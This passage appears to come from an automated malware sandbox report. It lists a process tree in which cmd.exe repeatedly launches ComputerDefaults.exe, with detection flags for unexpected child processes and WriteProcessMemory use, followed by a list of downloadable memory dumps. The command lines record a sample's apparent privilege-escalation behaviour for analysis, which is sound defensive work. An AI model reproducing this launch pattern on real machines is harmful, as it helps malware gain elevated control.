- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5468

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4968
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5388

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4960
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5316

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4944
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5516

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4928
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5336

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4936
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5484

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4920
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5400

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4912
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5352

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4880
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5328

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/996-124-0x000001CEE4120000-0x000001CEE4121000-memory.dmp

Filesize
4KB

Download
memory/996-123-0x000001CEE4110000-0x000001CEE4111000-memory.dmp

Filesize
4KB

Download
memory/996-122-0x000001CEE4100000-0x000001CEE4101000-memory.dmp

Filesize
4KB

Download
memory/996-121-0x000001CEE40D0000-0x000001CEE40D1000-memory.dmp

Filesize
4KB

Download
memory/996-125-0x000001CEE4130000-0x000001CEE4131000-memory.dmp

Filesize
4KB

Download
memory/996-119-0x000001CEE40B0000-0x000001CEE40B1000-memory.dmp

Filesize
4KB

Download
memory/996-120-0x000001CEE40C0000-0x000001CEE40C1000-memory.dmp

Filesize
4KB

Download
memory/996-117-0x000001CEE3A50000-0x000001CEE3A51000-memory.dmp

Filesize
4KB

Download
memory/996-144-0x000001CEE4730000-0x000001CEE4731000-memory.dmp

Filesize
4KB

Download
memory/996-118-0x000001CEE3A60000-0x000001CEE3A61000-memory.dmp

Filesize
4KB

Download
memory/996-115-0x000001CEE2190000-0x000001CEE2191000-memory.dmp

Filesize
4KB

Download
memory/996-114-0x000001CEE2040000-0x000001CEE2046000-memory.dmp

Filesize
24KB

Download
memory/996-116-0x000001CEE3A40000-0x000001CEE3A41000-memory.dmp

Filesize
4KB

Download
memory/2364-126-0x000001E450B10000-0x000001E450B14000-memory.dmp

Filesize
16KB

Download